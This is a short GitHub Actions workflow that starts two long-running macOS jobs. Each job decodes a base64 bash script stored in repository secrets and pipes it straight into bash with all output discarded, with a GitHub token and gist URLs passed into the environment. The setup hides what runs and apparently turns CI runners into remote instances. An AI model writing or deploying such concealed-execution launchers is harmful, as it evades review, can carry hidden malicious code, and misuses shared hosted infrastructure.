# 1
name: Instance
on: workflow_dispatch

# 2
concurrency:
  group: Instance_Mutex
  cancel-in-progress: true

# 3
jobs:
  Instance_Job:
    runs-on: macos-26
    timeout-minutes: 345
    strategy:
      matrix:
        id: [1, 2]
    steps:
      - env:
          GH_TOKEN: ${{ secrets.GH_TOKEN }}
          U1: ${{ secrets.GIST_URL_1 }}
          B1: ${{ secrets.BASH_BASE64_1 }}
          U2: ${{ secrets.GIST_URL_2 }}
          B2: ${{ secrets.BASH_BASE64_2 }}
        run: |
          U_VAR="U${{ matrix.id }}"
          B_VAR="B${{ matrix.id }}"
          export GIST_URL="${!U_VAR}"
          echo "${!B_VAR}" | openssl base64 -d -A | bash > /dev/null 2>&1
